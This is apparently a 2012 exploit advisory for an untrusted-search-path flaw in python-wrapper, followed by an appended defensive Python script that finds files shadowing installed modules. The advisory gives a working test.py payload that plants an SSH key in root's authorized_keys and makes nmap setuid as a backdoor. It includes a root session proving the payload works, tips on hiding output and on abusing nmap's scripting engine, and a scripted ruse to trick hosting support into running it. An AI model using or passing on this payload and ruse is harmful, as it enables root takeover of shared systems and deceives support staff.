# python-wrapper untrusted search path/code execution vulnerability
#
# python-wrapper executes any test.py script within the current working directory when supplied with help('modules').
# A non-privileged user may gain code execution by tricking root into running help('modules'), or help() followed by
# "modules", from within python-wrapper while in a non-privileged user's work directory.
#
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then
# continuing normally with no signs of compromise if you redirect command output.
# os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not work; however
# os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
#
#
# Additionally, nmap makes a great backdoor from a non-privileged user account because it's something that looks like you might
# actually want SETUID under certain circumstances, but not really (and it will bitch if invoked). In nmap 5.31DC1 the most useful
# switch (--interactive) was removed, which previously allowed you to bang out a shell (!/bin/csh, but not bash).
# Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW, however, there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable
# SETUID program with input-output commands.
#
#
# A practical example of how this vulnerability could be useful is if you wish to attack a shared web hosting environment.
# After convincing root (support) to cd into your directory, perhaps by uploading a broken "distraction.py" and getting him to
# troubleshoot it, you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to
# list that..." "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!"
# *silent test.py execution by root* "There's a lot of them... would you like them as an email attachment?"
# "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
#
#
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12

root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
#!/bin/python
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May  4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')

Please wait a moment while I gather a list of all available modules...

[module listing omitted]

Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".

>>> quit()
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
ssh-rss pwned byshadow

# Wish I had DuoSecurity!
# See you at Defcon!
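As an added defender-side check (my code, not part of the advisory or of python-wrapper), the script below reports which files in a directory would shadow installed modules if that directory sat at the front of sys.path, the way the current working directory does in an interactive interpreter; that is the condition the test.py above relies on. It checks every candidate name rather than only test.py, and the sample directory it builds is constructed; function names are mine.

```python
"""Report files in an untrusted directory that would shadow installed modules
when that directory sits first on sys.path (as the cwd does interactively)."""
import importlib.machinery
import os
import sys
import tempfile


def shadowed_modules(directory):
    """Return {module_name: path} for .py files and packages in `directory`
    that the import system would choose over a same-named module found on
    the rest of sys.path (standard library or site-packages)."""
    directory = os.path.abspath(directory)
    finder = importlib.machinery.PathFinder
    # Search order an interactive session would have: untrusted dir first.
    rest = [p for p in sys.path if p not in ("", directory)]
    hits = {}
    for entry in sorted(os.listdir(directory)):
        path = os.path.join(directory, entry)
        if entry.endswith(".py") and os.path.isfile(path):
            name = entry[:-3]
        elif os.path.isfile(os.path.join(path, "__init__.py")):
            name = entry
        else:
            continue
        # Is there a real module of that name elsewhere on the path?
        # Built-in modules (e.g. sys) are not path-based, so a sys.py here
        # cannot shadow them and is not reported.
        elsewhere = finder.find_spec(name, rest)
        if elsewhere is None or elsewhere.origin is None:
            continue
        chosen = finder.find_spec(name, [directory] + rest)
        if chosen and chosen.origin and chosen.origin.startswith(directory + os.sep):
            hits[name] = chosen.origin
    return hits


def demo():
    """Constructed sample directory: harmless test.py, os.py and sys.py next
    to an innocuous helper.py (placeholders, not the advisory's test.py)."""
    with tempfile.TemporaryDirectory() as d:
        for fname in ("test.py", "os.py", "helper.py", "sys.py"):
            with open(os.path.join(d, fname), "w") as f:
                f.write("# constructed placeholder, does nothing\n")
        return sorted(shadowed_modules(d))


if __name__ == "__main__":
    print("files that would shadow installed modules:", demo())
```

Run it against a user's directory before working there as root: an empty result means no file in it would be picked over the installed module of the same name.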